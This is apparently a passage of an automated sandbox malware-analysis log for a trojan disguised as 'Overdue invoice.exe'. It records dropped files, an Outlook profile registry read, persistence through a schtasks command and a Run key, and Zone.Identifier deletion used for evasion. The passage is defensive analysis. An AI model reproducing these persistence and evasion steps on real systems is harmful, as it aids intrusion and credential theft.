                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exeJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA306.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: Overdue invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Overdue invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_01
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Overdue invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Overdue invoice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027366AD push FFFFFF8Bh; iretd 0_2_027366AF
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07263D82 push esi; retf 0_2_07263D98
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016D5170 push es; ret 7_2_016D5188
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016D5150 push es; ret 7_2_016D5168
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE5D push es; retf 7_2_064EAE84
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE1E push es; retf 7_2_064EAE20
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE1A push es; retf 7_2_064EAE1C
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE16 push es; retf 7_2_064EAE18
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE2E push es; retf 7_2_064EAE30
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE2A push es; retf 7_2_064EAE2C
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE26 push es; retf 7_2_064EAE28
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE22 push es; retf 7_2_064EAE24
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE3A push es; retf 7_2_064EAE3C
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE36 push es; retf 7_2_064EAE38
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAE32 push es; retf 7_2_064EAE34
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAC41 push es; retf 7_2_064EACBC
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EACBE push es; retf 7_2_064EAD54
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAD56 push es; retf 7_2_064EAE14
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EBA60 push es; ret 7_2_064EBA70
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EAA09 push es; retf 7_2_064EAC24
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E3139 push es; iretd 7_2_064E313C
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C697CB push ss; ret 7_2_06C697D2
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C617E9 push es; ret 7_2_06C618C4
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C69783 push ss; ret 7_2_06C697CA
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C61789 push es; ret 7_2_06C618C4
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6177F push es; ret 7_2_06C618C4
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6977B push ss; ret 7_2_06C69782
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C69778 push ss; ret 7_2_06C6977A
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C63330 push es; iretd 7_2_06C641D0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C618CB push es; ret 7_2_06C61910
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C618AF push es; ret 7_2_06C61910
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.65168574947
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Users\user\Desktop\Overdue invoice.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDNJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDNJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess information set: NOOPENFILEERRORBOX
